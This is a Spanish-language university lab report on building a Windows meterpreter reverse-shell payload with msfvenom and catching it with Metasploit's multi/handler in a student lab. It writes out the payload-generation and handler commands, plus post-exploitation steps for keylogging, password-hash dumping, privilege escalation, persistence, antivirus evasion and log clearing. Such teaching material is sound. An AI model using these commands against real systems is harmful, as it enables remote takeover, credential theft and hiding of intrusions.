Universidad Tecnológica de León Ingeniería en Redes Inteligentes y Ciberseguridad
Asignatura: Automatización de Infraestructura Digital II
Profesor: Juan Carlos Almonaci Puga
Título del trabajo: Payload con Metasploit
Presenta: Porras Noriega Fátima Abigail
Matrícula: 18002125
Grupo: IRIC 1001
León, Guanajuato. A 30 de septiembre de 2021
CREACIÓN Y EJECUCIÓN DE UN PAYLOAD CON MSFCONSOLE ¿QUÉ ES MSFCONSOLE? Metasploit es una herramienta para desarrollar y ejecutar exploits contra una máquina remota, permite realizar auditorías de seguridad, probar y desarrollar sus propios exploits. Creado originalmente en lenguaje de programación Perl, el Metasploit Framework ha sido completamente reescrito en lenguaje Ruby. Es una de las herramientas más flexibles, con múltiples funciones, y bien soportada dentro del framework de metasploit. Msfconsole ofrece una práctica interfaz todoen-uno para casi todas las opciones y la configuración disponible en el Framework. Se puede utilizar msfconsole para hacerlo todo, incluyendo el lanzamiento de un exploit, cargando módulos auxiliares, realizando la enumeración, la creación de los oyentes, o correr explotaciones masivas contra una red completa. ¿QUÉ ES UN EXPLOIT? Un exploit es el medio por el cual un atacante, o pen tester para el caso, toma ventaja de una falla en un sistema, una aplicación o un servicio. Un atacante utiliza un exploit para atacar a un sistema de una manera que da lugar a un resultado particular deseado que el desarrollador nunca pretendió. Exploits comunes son desbordamientos de búfer, vulnerabilidades de las aplicaciones web (como la inyección SQL), y errores de configuración. ¿QUÉ ES UN PAYLOAD? Un payload es el código que queremos que el sistema se ejecute y que se va a seleccionar y entregar por el marco. Por ejemplo, un reverse Shell es un payload que crea una conexión desde el equipo de destino del atacante como un símbolo del sistema (command prompt) de Windows, mientras que un bind Shell es un payload que “une” un símbolo del sistema para un puerto de escucha en la máquina de destino, que el atacante puede conectarse. Una carga útil también podría ser algo tan simple como un par de comandos que se ejecutan en el sistema operativo de destino. Los pasos que se llevaron a cabo en la práctica realizada fueron los siguientes: Paso 1. Abrir terminal en Kali Linux:
Paso 2. Ejecutar comando msfvenom:
Paso 3. Verificar la IP local con el comando ip address:
Paso
4.
Ejecutar
msfvenom
-a
x86
--platform
Windows
-p
windows/meterpreter/reverse_tcp LHOST=(ip_local) LPORT=(puerto) -f exe -o payload.exe. En donde: En ip_local se captura la ip local de KALI (en este caso 192.168.1.13); en el puerto se usa el 443 para evitar ser detectado por el antivirus; y Payload.exe, es el nombre del archivo que se va a crear y servirá para infectar el equipo:
Paso 5. Ejecutar comando msfconsole:
Paso
6.
Dentro
de
la
Aplicación
Metasploit
ejecutar
el
comando
use
exploit/multi/handler:
Paso 7. Volver a ejecutar el comando set payload windows/meterpreter/reverse_tcp y usando el método PAYLOAD configurar la IP local y el puerto a utilizar con los comandos set LHOST (IP_LOCAL), set LPORT (puerto) y finalmente ejecutar el comando show options para verificar que los cambios estén aplicados:
Paso 8. Ejecutar el comando exploit:
Paso 9. En el explorador de archivos, buscar el archivo EXE creado y comprimirlo:
Paso 10. Copiar el archivo al equipo de Windows en el escritorio, descomprimir y ejecutar el EXE:
Paso 11. Regresar a KALI y ejecutar en metasploit el comando sessions 1 -i:
Algunas de las opciones interesantes por utilizar en metasploit son las siguientes: •
sysinfo: Muestra la versión de Windows del equipo infectado:
•
getsystem: Eleva el nivel de privilegios para SYSTEM:
•
ipconfig: Muestra la dirección IP del equipo infectado:
•
screenshot: Guarda un archivo JPGE de la pantalla del cliente:
Como se puede visualizar en las siguientes imágenes, el nombre con el que se guardó la captura de pantalla coincide perfectamente.
•
keyscan_start: Inicia keylogger y deja una captura de todo lo capturado en el teclado de la computadora:
La siguiente captura de pantalla muestra un ejemplo de texto escrito en una nota de Windows, en ella se escribió el mensaje “Hola, me llamo Abigail Porras”. Lo cual servirá en el siguiente comando para el keylogger.
•
keyscan_dump: Visualiza los datos capturados:
•
keyscan_stop: Detiene la captura de datos:
•
run persistence -X: Este comando configura la maquina infectada para que cada inicio del sistema se establezca la conexión por default:
•
hashdump: Para captura rápida:
•
execute: Ejecuta un comando en la máquina cliente ejemplo: execute -f calc.exe:
Y en Windows se abre la calculadora:
•
shell: Abre una ventana de comandos de Windows pero en Kali:
•
clearev: Limpia los logs del sistema para no dejar rastro:
CONCLUSIÓN Al finalizar esta práctica, la cual me agradó bastante, pude concluir que el crear un payload para robar información es demasiado sencillo ya que Kali Linux hace estas tareas de una manera muy fácil y rápida. El aprender todos estos comandos fue de mucha utilidad porque así podemos incluso estar alertas en nuestras máquinas para darnos cuenta si estamos siendo víctimas de un ataque de payload o de keylogger tal y como se vio en el ejemplo al ejecutar el exploit, lo cual sería crucial conocer para todas las personas porque eso traería una enorme pérdida de información privada.